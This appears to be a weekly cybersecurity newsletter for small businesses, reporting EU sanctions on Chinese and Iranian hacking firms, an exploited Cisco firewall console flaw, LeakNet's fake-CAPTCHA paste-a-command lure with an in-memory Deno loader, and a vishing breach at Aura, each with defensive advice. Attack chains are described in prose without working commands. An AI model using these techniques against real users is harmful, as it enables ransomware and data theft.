#CyberWeekly

On March 16, the EU Council publicly named five actors — three companies, two individuals — responsible for state-sponsored cyberattacks against EU member states and their partners, and placed them under the EU's cyber sanctions regime. It's a rare move: the EU usually keeps attribution quiet. This week, it didn't.

• Integrity Technology Group (China): between 2022 and 2023, this Beijing company's tools compromised more than 65,000 devices across six EU member states. The EU didn't say "allegedly" — it said the company "routinely provided products used to compromise and access devices"
• Anxun Information Technology (China): provided hacking services aimed directly at critical infrastructure and critical functions across EU member states and third countries. Also known as I-Soon, previously exposed in a leaked document dump in 2024
• Emennet Pasargad (Iran): the private Iranian company that ran cyberattacks against Charlie Hebdo in 2023 and then targeted the Paris 2024 Olympic and Paralympic Games. The Olympics attack included DDoS campaigns and disinformation operations
• Two Chinese co-founders of one of the above companies are also individually listed, making them personally subject to asset freezes and EU travel bans

With these five new listings, the EU's horizontal cyber sanctions regime now covers 19 individuals and 7 entities. What this means practically: asset freezes, travel bans, and a public record that makes doing business with these actors illegal for EU companies. For SMEs, the takeaway isn't about sanctions — it's about who's in the threat landscape. Chinese state-linked contractors and Iranian private companies are actively targeting European infrastructure. Your CyFun controls exist precisely because these threats are real and named.

The device meant to protect your network from attackers became the attackers' entry point. CVE-2026-20131 is a CVSS 10.0 flaw in Cisco Secure Firewall Management Center (FMC) — the admin console used to manage Cisco firewall fleets. An unauthenticated attacker on the network sends a crafted HTTP request, bypasses authentication, and executes arbitrary code as root. Amazon threat intelligence confirmed active exploitation by Interlock ransomware.

• Zero-day timeline: Cisco disclosed the vulnerability on March 4, 2026. Interlock had been exploiting it since January 26 — 36 days of active attacks before a patch even existed. During that window, every unpatched Cisco FMC instance was a potential ransomware entry point
• Attack chain: crafted HTTP request → authentication bypass → arbitrary Java code execution as root → ELF binary fetched from attacker server → full network access. The attacker never needs credentials
• SharePoint also needs patching: CISA added CVE-2026-20963 (CVSS 8.8, Microsoft SharePoint deserialization) to its Known Exploited Vulnerabilities catalog on March 18, with a federal patch deadline of March 21. If your organization runs SharePoint on-premise, this is a P1
• What Interlock does next: once inside via FMC, the group deploys ScreenConnect for persistence, moves laterally, and eventually encrypts. The firewall admin console is their lateral movement launchpad

The pattern here isn't new — it's just getting faster. Zero-day exploitation windows are shrinking from months to weeks to days. Patch management needs to be a defined process, not a "we'll get to it" activity. For Cisco FMC specifically: isolate the management interface from general network access, verify your version is patched, and check your FMC logs for the January 26 onwards period for signs of the PUT request pattern described in Amazon's threat intel report.

LeakNet ransomware has a new entry method — and it doesn't require you to click a suspicious email or download a shady file. The group now compromises legitimate websites and injects fake CAPTCHA verification prompts. You land on a real site you've visited before. A verification dialog appears. You follow the steps. You've just run a malicious msiexec.exe command from your Windows Run dialog, and the payload is already executing in memory.

• The ClickFix technique: the fake CAPTCHA instructs you to open the Windows Run dialog and paste a command. The command looks like a verification step. It's actually an msiexec.exe call that fetches and runs the ransomware payload. No email. No download prompt. Just copy, paste, Enter
• Deno in-memory loader: LeakNet feeds the actual malicious payload to Deno (a JavaScript runtime) as a base64-encoded data URL. Deno decodes and executes it entirely in memory — no file ever touches disk, so traditional antivirus has nothing to scan
• Wide-net strategy: LeakNet isn't targeting a specific industry. It compromises any website it can and serves the fake CAPTCHA to whoever visits. Currently averaging ~3 victims per month, but scaling up as the technique spreads
• What makes this dangerous for SMEs: your employees visit supplier websites, client portals, local news sites. Any of those could be compromised and serving this prompt right now. The attack bypasses email filters entirely

Defense: social engineering awareness is the primary control here — your staff should know that no legitimate website will ever ask them to open the Run dialog and paste a command. That is always an attack. Application control policies that restrict msiexec.exe from running user-initiated commands add a second layer. And if your ransomware response plan doesn't cover in-memory payloads that leave no disk trace, now is the time to update it.

Aura is a company that sells identity protection. Its product monitors for breaches, alerts customers when their data appears online, and promises to keep personal information safe. On March 19, Aura confirmed that ShinyHunters had stolen 900,000 customer records — names, email addresses, phone numbers, physical addresses, IP addresses, and customer service comments. The method: a targeted voice phishing call to a single employee. One call. Roughly one hour of access. 903,100 accounts on Have I Been Pwned.

• What happened: an Aura employee received a targeted phone call from someone posing as IT support. The attacker convinced the employee to hand over account access. The attacker had that access for approximately one hour before detection
• Scale vs. access time: one hour was enough to exfiltrate contact records for 900,000 people. Aura says fewer than 20,000 active and 15,000 former customers had data accessed — the rest appear to be older records. No passwords, SSNs, or financial data were in scope
• ShinyHunters: the same group behind the 2024 Ticketmaster breach (560M records), the Santander breach, and dozens of others. They now appear to be running a parallel Salesforce Experience Cloud campaign targeting 400+ companies using a weaponized internal security tool
• The irony writes itself: a company whose entire value proposition is protecting identities was defeated by a social engineering call — not a technical exploit, not a zero-day. The most advanced threat actor doesn't need one when a phone call works just as well

For Belgian SMEs and MSPs, the lesson isn't "Aura should have known better." The lesson is that no technical security stack protects against an employee who's been socially engineered. Every organization — including security vendors — needs social engineering awareness training, strict verification protocols for IT support calls, and call-back verification before anyone hands over account access. Your access control policies should define what IT support is and isn't allowed to ask for on the phone. Write it down. Train it. Test it.